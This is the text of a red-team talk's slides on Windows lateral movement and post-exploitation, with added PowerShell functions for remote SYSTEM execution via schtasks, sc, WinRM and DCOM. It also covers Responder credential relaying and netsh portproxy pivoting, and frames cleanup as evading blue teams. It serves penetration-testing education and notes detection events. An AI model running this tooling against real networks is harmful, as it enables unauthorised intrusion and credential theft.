Matt Batten (SleepZ3R0) spoke at BSides Augusta and BSides RDU; these are our slides. We hope you can learn and benefit from them. If you have any questions, feel free to send us messages on Twitter; we will always respond.
2. Matt Batten (SleepZ3R0)
▶ Twitter: @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ Where I work:
▶ Husband / Red Teamer / Penetration Tester / Developer /
Marine Corps Veteran / Cat Dad
3. Collyn Hartley (HA12TL3Y)
▶ Twitter: @HA12TL3Y
▶ Military Red Teamer
▶ Brother / Red Teamer / Penetration Tester /
Active Duty Military / Dog Dad
4. What will be covered
▶ Initial Recon once on a compromised system
▶ Lateral movement
▶ How to do port forwarding in more than one way with real examples
▶ How to utilize tradecraft to not get caught while moving
▶ What tools are being used today
5. Setting the Stage
▶ You have already compromised a system utilizing your preferred
method
6. First things first…
Once on a compromised system here are some questions to ask
yourself.
▶ Who am I on this network?
▶ Where am I in this network?
▶ Can I move to another system with my current permissions?
▶ Can I get SYSTEM on my current compromised system?
7. Understand your surroundings
Part 1
▶ net user
▶ net user /domain
▶ net group "Domain Admins" /domain
▶ net group /domain
▶ net use
▶ net start
▶ net localgroup /domain
▶ netstat -ano
▶ netsh firewall show state
▶ netsh firewall show config
(netsh firewall is deprecated on Windows 7 / Server 2008 R2 and later; use netsh advfirewall show allprofiles there)
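The commands above answer the four questions from slide 6 one at a time. As an added example (not from the slides), the function below answers them from a single PowerShell session and returns the answers as one object, so the same check can be repeated on every host you land on. It is read-only and touches nothing on the network; the well-known SIDs used (S-1-5-32-544 for Administrators, RID 512 for Domain Admins, S-1-16-12288 for the High integrity label) are standard Windows values.

```powershell
# Added example: local foothold triage. Nothing here changes the host.
function Get-FootholdSummary {
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $prin = New-Object Security.Principal.WindowsPrincipal($id)
    $sids = @($id.Groups | ForEach-Object Value)
    $cs   = Get-CimInstance Win32_ComputerSystem

    # "Who am I?" - group membership is in the token even when UAC has filtered it
    $inAdministrators = $sids -contains 'S-1-5-32-544'
    $inDomainAdmins   = [bool]($sids | Where-Object { $_ -like 'S-1-5-21-*-512' })
    # High integrity label is only present on an elevated (unfiltered) token
    $elevated         = $sids -contains 'S-1-16-12288'
    # IsInRole(Administrator) is true only when the admin group is usable, i.e. elevated
    $usableAdmin      = $prin.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # "Can I get SYSTEM?" - an elevated admin can, and SeImpersonate alone is usually enough
    $privs = @((whoami /priv /fo csv | ConvertFrom-Csv).'Privilege Name')
    $canReachSystem = $usableAdmin -or ($privs -contains 'SeImpersonatePrivilege') `
                                   -or ($privs -contains 'SeAssignPrimaryTokenPrivilege')

    # "Where am I?" - domain membership, which DC answered our logon, and our addresses
    $domain = if ($cs.PartOfDomain) { $cs.Domain } else { 'not domain-joined' }
    $ips = @(Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
             ForEach-Object { $_.IPAddress } | Where-Object { $_ -notlike '*:*' })

    # Firewall state; Get-NetFirewallProfile exists on Windows 8 / Server 2012 and later
    $fwOn = try { @(Get-NetFirewallProfile -ErrorAction Stop | Where-Object Enabled).Name -join ',' }
            catch { 'unknown (use netsh advfirewall show allprofiles)' }

    [pscustomobject]@{
        User             = $id.Name
        InAdministrators = $inAdministrators
        Elevated         = $elevated
        DomainAdmin      = $inDomainAdmins
        CanReachSystem   = $canReachSystem
        Domain           = $domain
        LogonServer      = $env:LOGONSERVER
        IPv4             = $ips -join ','
        FirewallProfiles = $fwOn
    }
}

Get-FootholdSummary | Format-List
```

InAdministrators true with Elevated false is the common case on a phished user with a local admin account: you are an admin, but this token is UAC-filtered, and remote commands run from it will be rejected unless you elevate first.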
21. Remote Code Execution #2
▶ SCHTASKS
shell schtasks /create /tn <matt> /tr c:\windows\temp\matt.exe
/sc once /st 00:00 /s <target> /ru SYSTEM
shell schtasks /run /tn <matt> /s <target>
Then delete the task after it executes
shell schtasks /delete /tn <matt> /s <target> /f
23. Remote Code Execution #3
▶ SERVICE (SC)
shell sc \\<target> create <matt>
binpath= "c:\windows\temp\<matt.exe>"
shell sc \\<target> start <matt>
(a plain executable is not a real service, so the Service Control Manager reports
error 1053 on start, but the binary has still been launched as SYSTEM)
Make sure to delete the service after it runs
shell sc \\<target> delete <matt>
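The two one-liner sequences above (schtasks on slide 21 and sc on slide 23) are easy to leave half-finished when the run step fails, which is exactly how tasks and services get left behind for a blue team to find. As an added example (not from the slides), here are both wrapped as PowerShell functions that always run their cleanup step in a finally block. Assumptions: the current token is a local admin on the target, TCP 445 (schtasks, sc) and 135 are reachable, and the payload has already been copied to the target path; task/service names and paths are placeholders.

```powershell
# Added example: schtasks and sc remote execution with guaranteed cleanup.
function Invoke-RemoteScheduledTask {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][string]$TaskName,
        [Parameter(Mandatory)][string]$RemotePath   # e.g. C:\Windows\Temp\matt.exe as seen on the target
    )
    try {
        # /sc once /st 00:00 means the task never fires on its own; we trigger it with /run
        schtasks.exe /create /s $Target /tn $TaskName /tr $RemotePath /sc once /st 00:00 /ru SYSTEM /f | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "schtasks /create failed on $Target (exit $LASTEXITCODE)" }
        schtasks.exe /run /s $Target /tn $TaskName | Out-Null
        Start-Sleep -Seconds 5   # give the payload a moment to start before the task definition is removed
    }
    finally {
        # always remove the task, even if /run failed, so no scheduled-task artifact is left
        schtasks.exe /delete /s $Target /tn $TaskName /f | Out-Null
    }
}

function Invoke-RemoteService {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$RemotePath
    )
    try {
        # sc.exe requires the space after "binpath=", so it is passed as two arguments
        sc.exe "\\$Target" create $ServiceName binpath= $RemotePath | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "sc create failed on $Target (exit $LASTEXITCODE)" }
        # a normal exe is not a service: SCM returns error 1053 here, but the binary has run as SYSTEM
        sc.exe "\\$Target" start $ServiceName | Out-Null
        Start-Sleep -Seconds 5
    }
    finally {
        sc.exe "\\$Target" delete $ServiceName | Out-Null
    }
}

# Usage (placeholders):
# Invoke-RemoteScheduledTask -Target 'WS01' -TaskName 'matt' -RemotePath 'C:\Windows\Temp\matt.exe'
# Invoke-RemoteService      -Target 'WS01' -ServiceName 'matt' -RemotePath 'C:\Windows\Temp\matt.exe'
```

Both methods leave an event trail on the target regardless of cleanup: task creation is logged in the Microsoft-Windows-TaskScheduler/Operational log, and service creation raises System event 7045. Deleting the task or service removes the persistence artifact, not the log entries.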
26. WinRM
▶ Listens on port 5985 (HTTP) and 5986 (HTTPS). Traffic on 5985 is still encrypted at the message level by Kerberos or NTLM unless AllowUnencrypted has been set, so "HTTP" does not mean plaintext.
▶ If 5985 is open then you can enumerate using WinRM
▶ By default the account has to be a local Administrator (or a member of Remote Management Users) on the target to run:
Invoke-Command -ComputerName TARGET -ScriptBlock {commands}
On Windows Vista / Server 2008 and newer there is also Windows Remote Shell (winrs):
winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"
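Invoke-Command against one TARGET is the building block; in practice you have a list of hosts and want to know which ones accept your token before you spend it. As an added example (not from the slides), the function below probes WinRM on each host and then runs one enumeration script block across every host that answered. Assumptions: the token or supplied credential is a local admin on the targets, 5985 is reachable, and the hostnames passed in are placeholders.

```powershell
# Added example: WinRM reachability sweep followed by fan-out enumeration.
function Invoke-WinRmSweep {
    param(
        [Parameter(Mandatory)][string[]]$Targets,
        [pscredential]$Credential           # omit to use the current token
    )
    # Test-WSMan sends an unauthenticated WS-Man Identify request, so it is a cheap
    # "is WinRM on?" probe that does not expose a credential to the target
    $alive = foreach ($t in $Targets) {
        try   { Test-WSMan -ComputerName $t -ErrorAction Stop | Out-Null; $t }
        catch { Write-Verbose "$t : no WinRM ($($_.Exception.Message))" }
    }
    if (-not $alive) { return }

    $params = @{ ComputerName = $alive; ErrorAction = 'SilentlyContinue' }
    if ($Credential) { $params.Credential = $Credential }

    # One Invoke-Command with many ComputerNames runs the block in parallel (default throttle 32)
    Invoke-Command @params -ScriptBlock {
        # runs on the target: a network logon (type 3), so no reusable credentials are cached there
        $admins = net localgroup Administrators |
                  Select-Object -Skip 6 |
                  Where-Object { $_ -and $_ -notmatch '^The command' }
        [pscustomobject]@{
            Host        = $env:COMPUTERNAME
            RunningAs   = [Security.Principal.WindowsIdentity]::GetCurrent().Name
            LocalAdmins = $admins -join ';'
            ConsoleUser = (Get-CimInstance Win32_ComputerSystem).UserName
        }
    }
}

# Usage (placeholder hostnames):
# Invoke-WinRmSweep -Targets 'WS01','WS02','SRV01' -Verbose | Format-Table -AutoSize
```

Hosts where your account is not an admin simply drop out of the results (the access-denied errors are suppressed), so the output is the set of hosts you can already move to. Each successful connection is logged on the target as a 4624 type-3 logon and in the Microsoft-Windows-WinRM/Operational log, which is what defenders hunting WinRM-based movement look at.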
29. DCOM
▶ Matt Nelson documented this method of using DCOM over RPC to
instantiate an "MMC20.Application" COM object on the target and then calling its
Document.ActiveView.ExecuteShellCommand method.
▶ Result:
▶ Immediate command execution on the target under the administrative
account used, as a child process of mmc.exe.
▶ Implementation Details:
▶ The client first connects to the RPC endpoint mapper
(the RpcSs service in svchost.exe, listening directly on TCP port 135),
which returns the ephemeral port of the DCOM RPC server (such as 49154 or
49159); the activation request is then sent to that port.
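As an added example (not from the slides, and not Matt Nelson's own code), here is the MMC20.Application technique described above wrapped in a function that releases the remote COM object when it is done, so you do not leave an idle mmc.exe behind on the target. Assumptions: the current token is a local admin on the target, TCP 135 and the ephemeral RPC range are reachable, and the target and command are placeholders.

```powershell
# Added example: DCOM lateral movement via MMC20.Application.
function Invoke-DcomMmc20 {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][string]$Command   # run on the target via cmd.exe /c
    )
    $mmc = $null
    try {
        # Remote activation: endpoint mapper on 135 first, then the ephemeral port it hands back.
        # GetTypeFromProgID returns $null (no exception) when activation is refused.
        $type = [Type]::GetTypeFromProgID('MMC20.Application', $Target)
        if (-not $type) { throw "MMC20.Application could not be activated on $Target" }
        $mmc = [Activator]::CreateInstance($type)

        # ExecuteShellCommand(Command, Directory, Parameters, WindowState); '7' = minimized window
        $mmc.Document.ActiveView.ExecuteShellCommand('cmd.exe', $null, "/c $Command", '7')
        Write-Verbose "Command dispatched on $Target; it runs as a child of mmc.exe"
    }
    finally {
        if ($mmc) {
            # Close the remote MMC instance; the cmd.exe child we spawned is not affected.
            $mmc.Quit()
            [Runtime.InteropServices.Marshal]::ReleaseComObject($mmc) | Out-Null
        }
    }
}

# Usage (placeholders):
# Invoke-DcomMmc20 -Target 'WS01' -Command 'C:\Windows\Temp\matt.exe' -Verbose
```

The tradecraft point: the process tree on the target is svchost.exe (DcomLaunch) > mmc.exe > cmd.exe, and mmc.exe spawning a shell is an unusual parent/child pair that Sysmon event 1 or EDR process-tree rules catch easily. If the target blocks 135 or the dynamic RPC range at the host firewall, the activation fails at GetTypeFromProgID and this method is not available.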
31. Responder
LLMNR and NBT-NS spoofing is still an easy way, even today,
to harvest credentials (NetNTLM challenge/responses) and move laterally,
riding on nothing more than the network's normal name-resolution traffic.
34. Multi-Relay
▶ A powerful pentest utility included in Responder's tools folder giving
you the ability to perform targeted NTLMv1 and NTLMv2 relay against a
selected target.
▶ Currently MultiRelay relays HTTP, WebDAV, proxy, and SMB
authentications to an SMB server.
▶ The tool can be given a list of users to relay, so that only the
authentications worth relaying are used: Domain Admins, local
Administrators, or other privileged accounts.
36. PORT FORWARDING
▶ SSH port forwarding
ssh -L 8080:internalTarget:80 user@compromisedMachine
▶ Metasploit (Meterpreter) port forwarding
portfwd add -l 3389 -p 3389 -r 172.16.194.191
▶ Plink port forwarding
plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw password
▶ Proxychains port forwarding: SOCKS with Cobalt Strike
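The slide promises more than one way to forward a port, and all four above need a tool on the pivot. One more that needs nothing but the OS is netsh interface portproxy on a compromised Windows host, which is worth knowing both because it works where you cannot drop a binary and because its entries are persistent and easy to forget. As an added example (not from the slides), the functions below add, list and remove a v4tov4 forward; they assume an elevated token on the pivot, and the ports and addresses in the usage lines are placeholders.

```powershell
# Added example: native Windows port forward with netsh interface portproxy.
function Add-PortProxy {
    param(
        [Parameter(Mandatory)][int]$ListenPort,
        [Parameter(Mandatory)][string]$ConnectHost,   # internal target the pivot can reach
        [Parameter(Mandatory)][int]$ConnectPort,
        [string]$ListenAddress = '0.0.0.0'            # use 127.0.0.1 if only local tunnels should hit it
    )
    # portproxy is implemented by the IP Helper service; it must be running
    if ((Get-Service iphlpsvc).Status -ne 'Running') { Start-Service iphlpsvc }

    netsh interface portproxy add v4tov4 listenaddress=$ListenAddress listenport=$ListenPort `
        connectaddress=$ConnectHost connectport=$ConnectPort | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "netsh portproxy add failed (exit $LASTEXITCODE)" }

    # The host firewall still has to allow inbound $ListenPort; open it only for the
    # address you will connect from rather than for everyone
    Write-Verbose "Forward added: $ListenAddress`:$ListenPort -> $ConnectHost`:$ConnectPort (remember the firewall rule)"
    Get-PortProxy
}

function Get-PortProxy {
    # The entries live under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy and survive reboots,
    # so list them before and after an engagement to make sure nothing is left behind
    netsh interface portproxy show v4tov4
}

function Remove-PortProxy {
    param(
        [Parameter(Mandatory)][int]$ListenPort,
        [string]$ListenAddress = '0.0.0.0'
    )
    netsh interface portproxy delete v4tov4 listenaddress=$ListenAddress listenport=$ListenPort | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "netsh portproxy delete failed (exit $LASTEXITCODE)" }
}

# Usage (placeholders): expose an internal RDP server through the pivot on port 3390,
# connect to pivot:3390 from your box, then remove the forward when done.
# Add-PortProxy -ListenPort 3390 -ConnectHost '10.10.20.15' -ConnectPort 3389 -Verbose
# Remove-PortProxy -ListenPort 3390
```

From the defender's side the same persistence is the tell: a non-empty netsh interface portproxy show all on a workstation is almost never legitimate, so clean up with Remove-PortProxy rather than relying on a reboot.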
45. People who have influenced us and this talk
(even if they don’t know it!)
@harmj0y @malwareunicorn
@_wald0 @ReL1K
@CptJesus @mstair
@MadHatt3r @MalwareJake
@shortxstack @enigma0x3
@r3dQu1nn @danielhbohannon
@merrillmatt011 @georgiaweidman
@PyroTek3 @mubix
@byt3bl33d3r @H011YxW00D
@armitagehacker @Lee_Holmes
@gentilkiwi @SpectorOps
46. If you enjoyed this talk and would
like to know more
▶ Check out the references slide earlier in the deck.
▶ The slides will be published publicly.
▶ We do not yet know where the slides will be posted; if you
follow us on Twitter we will let you know shortly.
▶ If you have any questions, or are just interested in talking, feel free to
message either of us on Twitter and we will respond in a timely
manner.
▶ @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ @HA12TL3Y
Questions?